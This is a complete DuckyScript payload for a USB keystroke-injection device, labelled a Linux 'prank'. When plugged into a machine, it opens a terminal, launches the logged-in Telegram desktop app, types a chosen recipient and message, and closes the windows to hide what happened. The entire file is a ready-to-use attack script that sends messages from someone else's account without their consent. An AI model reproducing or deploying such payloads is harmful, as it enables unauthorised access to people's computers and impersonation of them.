REM #########################################
REM #                                       |
REM # Title        : Send Telegram Messages |
REM # Author       : Aleff                  |
REM # Version      : 1.0                    |
REM # Category     : Prank                  |
REM # Target       : Linux                  |
REM #                                       |
REM #########################################

REM Requirements:
REM     - Internet Connection
REM     - telegram-desktop installed and activated

DEFINE #USERNAME @example
DEFINE #MESSAGE example

DEFAULT_DELAY 500
CTRL ALT t
DELAY 2000

STRINGLN telegram-desktop
REM It depends by the computer...
DELAY 3000

REM Define the message receiver username
STRINGLN #USERNAME

REM Define the message(s)
STRINGLN #MESSAGE
REM other messages here...

REM Closing Telegram App and the Shell
ALT F4
CTRL c
ALT F4
